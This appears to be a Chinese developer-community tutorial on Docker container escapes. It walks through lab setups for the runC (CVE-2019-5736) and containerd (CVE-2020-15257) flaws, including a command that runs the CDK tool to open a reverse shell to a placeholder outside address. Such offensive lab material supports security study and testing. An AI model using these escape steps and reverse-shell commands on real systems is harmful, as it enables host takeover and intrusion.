备案控制台
开发者社区 云原生 文章 正文

云上攻防-云原生篇&Docker安全&系统内核&版本&CDK自动利用&容器逃逸

2024-06-19 39
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 云上攻防-云原生篇&Docker安全&系统内核&版本&CDK自动利用&容器逃逸

云原生-Docker安全-容器逃逸&内核

细节部分在权限提升章节会详解,常用:

CVE-2016-5195 CVE-2019-16884 CVE-2021-3493

CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222


云原生-Docker安全-容器逃逸&版本

-CVE-2019-5736 runC容器逃逸

Docker version <= 18.09.2

RunC version <= 1.0-rc6

1、安装docker对应版本

apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

2、启动环境测试:

docker run -itd --cap-add=SYS_ADMIN ubuntu:latest

3、编译修改后EXP后等待管理进入执行

https://github.com/Frichetten/CVE-2019-5736-PoC

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

docker cp main 7f4793f3ac0cd13:/
docker exec -it 7f4793f3ac0cd13 /bin/bash

还有一个条件就是执行main文件后需要管理员进入该容器进行触发

4、实验获取到docker搭建的Web权限后进行逃逸

docker run -it -p 8888:8080 vulhub/struts2:s2-053

-CVE-2020-15257 containerd逃逸

containerd < 1.4.3

containerd < 1.3.9

1、安装docker对应版本

apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

2、启动环境测试:

docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash
docker exec -it 5be3ed60f152 /bin/bash

3、上传CDK自动提权反弹

docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

4、实验获取到docker搭建的Web权限后进行逃逸

docker run -it -p 8888:8080 vulhub/struts2:s2-053

云原生-Docker安全-容器逃逸&CDK自动化

检测利用:https://github.com/cdk-team/CDK

信息收集-探测

./cdk_linux_amd64 evaluate

指定逃逸

./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

常规检测:https://github.com/teamssix/container-escape-check

实现:信息收集,指定逃逸,自动逃逸,修复功能等

文章标签:
容器
Docker
Cloud Native
安全
关键词:
容器docker
容器版本
Docker容器
Docker版本
云原生容器
今天是几号
目录
相关文章
龙大吉
|
5天前
|
安全 关系型数据库 开发者
Docker Compose凭借其简单易用的特性,已经成为开发者在构建和管理多容器应用时不可或缺的工具。
Docker Compose是容器编排利器,简化多容器应用管理。通过YAML文件定义服务、网络和卷,一键启动应用环境。核心概念包括服务(组件集合)、网络(灵活通信)、卷(数据持久化)。实战中,编写docker-compose.yml,如设置Nginx和Postgres服务,用`docker-compose up -d`启动。高级特性涉及依赖、环境变量、健康检查和数据持久化。最佳实践涵盖环境隔离、CI/CD、资源管理和安全措施。案例分析展示如何构建微服务应用栈,实现一键部署。Docker Compose助力开发者高效驾驭复杂容器场景。
龙大吉
16 1
龙大吉
|
5天前
|
存储 监控 安全
Docker Compose:轻松实现容器编排的利器
【7月更文挑战第2天】 1. **基础与概念**:服务(多容器实例)、网络(灵活通信)、卷(数据持久化)和配置(安全管理)。 2. **实战指南**:安装Compose,编写`docker-compose.yml`文件,启动应用,并介绍依赖、环境变量、健康检查和数据持久化。 3. **最佳实践**:环境隔离、CI/CD集成、资源管理、日志监控、安全策略及案例分析,展示完整应用栈搭建。
龙大吉
15 1
1941623231718325
|
10天前
|
jenkins 持续交付 开发者
利用Docker容器化部署应用的实战指南
【6月更文挑战第27天】本文详述Docker应用部署,涵盖Docker基本概念、安装、镜像制作及运行。通过编写Dockerfile构建镜像,使用`docker build`、`run`、`push`及`stop`命令管理。集成CI/CD工具如Jenkins,实现自动化构建、测试和部署,提升开发效率与部署质量。Docker助力轻量级、可移植的微服务架构。
1941623231718325
52 2
zdb呀
|
5天前
|
缓存 Linux 开发工具
docker的centos容器使用yum报错
docker的centos容器使用yum报错
zdb呀
17 0
游客kwe6k52lwpmug
|
8天前
|
Kubernetes Cloud Native Docker
云原生技术演进之路:从微服务到容器化
在数字化浪潮的推动下,云原生技术不断演进,为现代软件开发带来革命性变化。本文将深入探讨云原生技术的核心要素—微服务和容器化,揭示它们如何促进软件的快速迭代、可扩展性和可靠性提升。通过分析相关数据和案例研究,我们旨在阐明云原生技术在加速企业数字化转型中的关键作用。
游客kwe6k52lwpmug
16 0
泥腿子架构师
|
9天前
|
Java API Docker
使用Spring Boot和Docker进行容器化部署
使用Spring Boot和Docker进行容器化部署
泥腿子架构师
20 0
真的很搞笑
|
9天前
|
运维 Serverless 文件存储
函数计算产品使用问题之在利用Docker镜像部署应用时,容器内的应用如何能访问函数计算配置的NAS挂载
函数计算产品作为一种事件驱动的全托管计算服务,让用户能够专注于业务逻辑的编写,而无需关心底层服务器的管理与运维。你可以有效地利用函数计算产品来支撑各类应用场景,从简单的数据处理到复杂的业务逻辑,实现快速、高效、低成本的云上部署与运维。以下是一些关于使用函数计算产品的合集和要点,帮助你更好地理解和应用这一服务。
真的很搞笑
16 0
米诺斯
|
12天前
|
Docker 容器
Docker镜像、容器操作
Docker镜像、容器操作
米诺斯
39 0
小王老师呀
|
21天前
|
NoSQL 关系型数据库 Redis
Docker的通俗理解和通过宿主机端口访问Redis容器的实例
本文目标:引导初学者入门Docker,理解镜像、容器和宿主机概念,学习常用Docker命令,特别是如何创建并从Redis容器通过宿主机端口访问。 关键点: - Docker核心:镜像(类)、容器(实例)、宿主机(运行环境)。 - `docker pull` 拉取镜像,如 `redis:3.0`。 - `docker run -d --name` 后台运行容器,如 `my-redis`。 - `-p` 参数做端口映射,如 `6379:6379`。 - `docker exec -it` 交互式进入容器,如 `bash` 或执行命令。
小王老师呀
100 4
杨振平
|
安全 Linux Shell
Docker安全性(二)——带来了新的安全功能给Docker
Docker安全性(二)——带来了新的安全功能给Docker 本篇翻译自Daniel J Walsh的一篇开源文章:http://opensource.com/business/14/9/security-for-docker 作者的演讲视频:http://v.youku.com/v_show/id_XODQwNjUwNTIw.html 在这系列的第一篇Docker的安全性,我写了“容器中不包含”。
杨振平
1289 0

热门文章

最新文章

  • 1
    Docker详解(十三)——Docker容器的内存和磁盘I/O限制配置
  • 2
    Mac上轻松几步搞定Docker与Redis安装:从下载安装到容器运行实测全程指南
  • 3
    Java容器技术:Docker与Kubernetes
  • 4
    【Docker 专栏】Docker 容器性能调优实战
  • 5
    深入理解Docker自定义网络:构建高效的容器网络环境
  • 6
    【Docker 专栏】Docker 容器与宿主机的资源隔离机制
  • 7
    如何删除 Docker 镜像、容器和卷?
  • 8
    【Docker 专栏】Docker 容器化应用的备份与恢复策略
  • 9
    【Docker 专栏】Docker 容器内应用的健康检查与自动恢复
  • 10
    【Docker 专栏】Docker 容器内环境变量的管理与使用
  • 1
    探索云原生架构的未来之路
    20
  • 2
    构建未来:云原生架构在企业数字化转型中的关键作用
    20
  • 3
    构建未来:云原生架构在现代企业中的应用与挑战
    22
  • 4
    构建未来:云原生技术在企业数字化转型中的关键作用
    14
  • 5
    构建未来:云原生架构在现代企业中的应用与挑战
    26
  • 6
    云原生之使用Docker部署Teedy轻量级文档管理系统
    88
  • 7
    构建未来:云原生架构在企业数字化转型中的关键作用
    21
  • 8
    构建未来:云原生架构在企业数字化转型中的关键作用
    19
  • 9
    什么是云原生架构,我们该如何做好云原生安全,引领云计算时代的应用程序革新
    42
  • 10
    云原生之使用Docker部署homer静态主页
    38

    • 相关课程

    更多
  • 基于Docker与Jenkins实现自动化部署
  • 容器安全与Palo Alto Networks解决方案
  • Docker 快速入门
  • Docker完全自学手册图文教程
  • AI开发者的Docker实践
  • Docker 入门

    • 相关电子书

    更多
  • 应用 Docker 进行持续交付:用技术改变交付路程
  • 从Docker到容器服务
  • 构建基因数据应用生态系统—— docker in Bio/informatics

    • 相关实验场景

    更多
  • MySQL数据库快速部署实践
  • Docker镜像管理快速入门
  • 容器服务Serverless版ACK Serverless 快速入门:在线魔方应用部署和监控
  • 使用阿里云容器服务和容器网络文件系统搭建WordPress网站

    • 推荐镜像

    更多
  • docker-ce
  • docker-toolbox
  • pouch
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)